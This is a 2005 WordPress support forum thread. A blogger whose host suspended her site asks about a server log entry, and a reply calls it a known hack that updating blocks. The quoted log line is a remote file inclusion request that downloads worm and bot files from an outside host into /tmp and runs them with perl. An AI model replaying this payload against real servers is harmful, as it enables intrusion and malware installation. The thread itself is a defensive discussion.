WordPress.org

Ready to get started?Download WordPress

Forums

Was this a hack attempt? Did my web host over-react? (2 posts)

  1. Joni
    Member
    Posted 9 years ago #

    My site was down from about noon yesterday (CDT) until just now when I upgraded to WP 1.2.2.

    My webhost found this entry in my server logs and shut the site down:

    babygotblog.com - 145.24.132.250 - - [02/Jan/2005:12:06:57 -0500] "GET /index.php?p=http://www.5wk.com/spy.gif?&cmd=cd%20/tmp;wget%20http://www.5wk.com/spyworm1;perl%2
    0spyworm1;wget%20http://www.5wk.com/spybot HTTP/1.1" 403 - "-" "LWP::Simple/5.76"

    With the comment,

    That is not dealing with the Comment SPAM issue, that is an attempt to hack into your account. You need to make sure that you are running the latest version of the software and that all known security holes are patched. If you come into chat when you are ready to fix your site we can unsuspend your site.

    All's well that ends well, I suppose, but what troubles me is that I had something gobble up 5GB of bandwidth a couple of weekends ago and posted my solution on my blog, part of which was to disallow, via the .htaccess file, the user agent LWP::Simple. Yet, it appears this was part and parcel of the hack/script/string cited above. Does this mean that .htaccess "trick" is not working? (Bandwidth usage has settled back down to normal again, at least.)

    Any thoughts as to anything further I might do to forestall such an occurrence in the future other than to always run the latest stable WP?

    Thanks!

  2. Well, that is a known hack. And it is also known only to deface PHP pages. You have the latest version of WordPress, so you should be protected. If that isn't good enough for them, move to a better host. They have no ground to suspend your account, especially for something that they clearly know nothing about.

    http://www.dreamhost.com/

    Dreamhost supports WordPress and they know a thing or two about it. They even provide a one-click installation method.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.